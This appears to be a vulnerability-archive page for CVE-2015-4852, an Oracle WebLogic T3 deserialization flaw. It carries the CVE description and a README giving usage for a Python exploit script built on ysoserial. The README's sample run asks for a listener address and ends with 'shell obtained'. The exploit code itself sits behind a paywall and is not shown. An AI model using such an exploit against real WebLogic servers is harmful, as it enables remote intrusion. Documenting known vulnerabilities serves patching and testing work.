Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1336 CNY

100%

CVE-2015-4852 PoC — Oracle WebLogic Server WLS Security组件安全漏洞

Source
Associated Vulnerability
Title: Oracle WebLogic Server WLS Security组件安全漏洞 (CVE-2015-4852)
Description:The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to execute arbitrary commands via a crafted serialized Java object in T3 protocol traffic to TCP port 7001, related to oracle_common/modules/com.bea.core.apache.commons.collections.jar. NOTE: the scope of this CVE is limited to the WebLogic Server product.
Readme
# CVE-2015-4852
前提 需要将ysoserial.jar放置于脚本目录之下(将ysoserial-0*.jar重命名为ysoserial.jar),最好使用kali linux执行该脚本

1.使用方法:

root@kali:~# python3 CVE-2015-4852.py -h

Usage: python CVE-2015-4852.py -t/--target 1.1.1.1 7001


Options:

  -h, --help            show this help message and exit
  
  -t TARGET, --target=TARGET ip port
  
  
2.例: 

root@kali:~# python3 CVE-2015-4852.py -t 10.6.214.129 7001

请输入监听ip地址:10.6.214.1

请输入监听端口:7777

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

执行成功

获得shell

File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →